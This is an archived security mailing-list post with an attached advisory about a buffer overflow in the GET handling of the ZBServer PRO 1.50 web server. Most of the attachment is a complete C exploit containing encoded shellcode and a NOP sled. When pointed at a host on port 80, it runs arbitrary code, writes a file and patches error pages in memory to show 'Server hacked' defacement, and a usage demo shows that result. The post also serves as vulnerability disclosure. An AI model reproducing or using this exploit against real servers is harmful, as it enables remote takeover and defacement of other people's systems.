This is a multi-part message in MIME format. --------------893B8DFAF33940558EDF5A5B Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit hi, Few weeks ago USSRBACK found an buffer overflow in ZBServer (GET command). Well, it is an exploit tested on WinNT 4.0 (spanish version). It comes back with a raw eip in code (not jumps against "call register" or "jmp register"). If you want a real portable exploit you can replace last four bytes against a call edi + x where x > 10 bytes ( i left a lot of nops waiting that jump }:) i reverse the server too and exploit gets keep living ZBServer when it is exploited (restore registers and kill overflowed thread) so pages are served out normally. Exploit writes to disk an advisory file with information for webmasters or administrators. It serves out hacked pages too but it doesn't modifique any server page (it patchs error messages in memory). A real advisory is attached. Excuse my poor english. Greets to: Jack Barnaby AKA Dark Spyrit - http://www.beavuh.org USSRBACK - http://www.ussrback.com regards, |Zan -- |Zan / DeepZone (tm) - Digital Security Center http://www.deepzone.org (not available yet, intranet only) http://mareasvivas.cjb.net --=[ ... toda la vida buscando respuestas ... y cuando por fin las encuentas ... cambian las preguntas ]=-- --------------893B8DFAF33940558EDF5A5B Content-Type: text/plain; charset=us-ascii; name="zbserver.txt" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="zbserver.txt" Studying ZBServer 1.50-r1x overflow Advisory Name: ZBServer crash Advisory Released: [00/02/01] Application: personal web, ftp and gopher servers on Win9x, WinNT Severity: local/remote user with WebServer privileges can run arbitrary code. Status: overflow discovered by USSRBACK http://www.ussrback.com Author: izanat_private WWW: http://www.deepzone.org http://mareasvivas.cjb.net OVERVIEW ZBServer PRO 1.50 (all releases) has a buffer overflow in web server. Any local/remote user can run arbitrary code with web server privileges. Overflow was discovered by USSRBACK few weeks ago. The original USSRBACK post didn't contain any technical detail. The present document is a deep study about that advisory. It studies bug impact too. BACKGROUND Ideas and code were tested against Win9x and NT 4.0 sp 5 (all spanish version). The ZBServer PRO software is 1.50. All releases are affected (r13 to r17) DETAILS ZBServer PRO's WebServer has an overflow in "get command". It can't handle a long excesive request. When the string has a lenght about 766 bytes it crashs. The stack is overwritten. The vulnerability exists. USSRBACK' status (bof discovers) was originally: "Vendor Status: i email the vendor, and i dont have a responce :(" We have exploited and finished our exploit for WinNT and it's attached with this advisory. Arbitrary code can run with webserver privileges. Win9x version can't be exploitable with a clear environment. If you have a default debugger configuration or your processes are handled by a special process hooking errors and exceptions then it can be exploited too but it won't be the common scenary. Win9x version can't run arbitrary code with a clear environment but a DoS attack is possible. You can crash the service with a local/remote request. EXPLOIT ZBServer PRO 1.50-r1x exploit gets remote servers's full control. When you attacks a vulnerable server you can run abitrary code inside. Firstly, sploit creates an advisory file. It's information for administrative use. Later, exploit restores and kills overflowed thread but before it patchs some error information so all error pages will appear like hacked pages. If you have problems running ZBServer they can be with your return address (remember that tests ran against WinNT sp5 spanish version). I could jump against edi register + 5 (more portable) but i will have a static dll address dependence. Well, it wasn't a clear jump so i decided to implement the first technique but the second is possible too. ex. % lynx http://xxx.xxx.xxx.xxx WELCOME TO ... blah ... blah ..... (It's the root page) % lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was not found. % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html FILE NOT FOUND The request object (/FileNotAvailable.html) was not found. $ zbsploit xxx.xxx.xxx.xxx WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net - http://www.deepzone.org Coded by -=[|Zan]=- izanat_private - izanat_private done. $ lynx http://xxx.xxx.xxx.xxx WELCOME TO ... blah ... blah ..... (It's the root page again) % lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html Hello. You are running a ZBServer PRO's buggy version and you have been abused. More information can be downloaded from http://www.deepzone.org or http://mareasvivas.cjb.net regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo) Coded by |Zan. % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html Server hacked. http://www.deepzone.org Sploit coded by |Zan %_ ................................................ /** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT) ** ** ZBServer PRO 1.50-r1x exploit gets remote servers's full control. ** When you attacks a vulnerable server you can run abitrary code ** inside. Firstly, sploit creates an advisory file. It's information ** for administrative use. Later, exploit restores and kills ** overflowed thread but before it patchs some error information so ** all error pages will appear like hacked pages. ** ** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c ** run: ./slzbserv hostname ** ** http://mareasvivas.cjb.net / http://www.deepzone.org ** ** Coded by |Zan | izanat_private ** **/ #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/errno.h> #include <netdb.h> #define _PORT 80 #define _TamBuf 770 char crash[] = "GET /" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10" "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50" "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18" "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b" "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9" "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99" "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9" "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99" "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02" "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e" "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65" "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca" "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5" "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee" "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9" "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9" "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed" "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5" "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc" "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc" "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed" "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9" "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9" "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9" "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9" "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb" "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7" "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0" "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7" "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9" "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7" "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3" "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7" "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8" "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7" "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3" "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7" "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc" "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc" "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6" "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc" "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3" "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01"; int sock; struct sockaddr_in sock_a; struct hostent *host; int main (int argc, char *argv[]) { printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n"); printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n"); printf("Coded by -=[ |Zan ]=- izanat_private - izanat_private\n\n"); if(argc < 2) { fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]); exit(0); } if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); } sock_a.sin_family=AF_INET; sock_a.sin_port=htons(_PORT); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); } fflush(stdout); write(sock,crash,_TamBuf); write(sock,"\n\n", 2); printf("done.\n\n"); } --------------893B8DFAF33940558EDF5A5B--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:11 PDT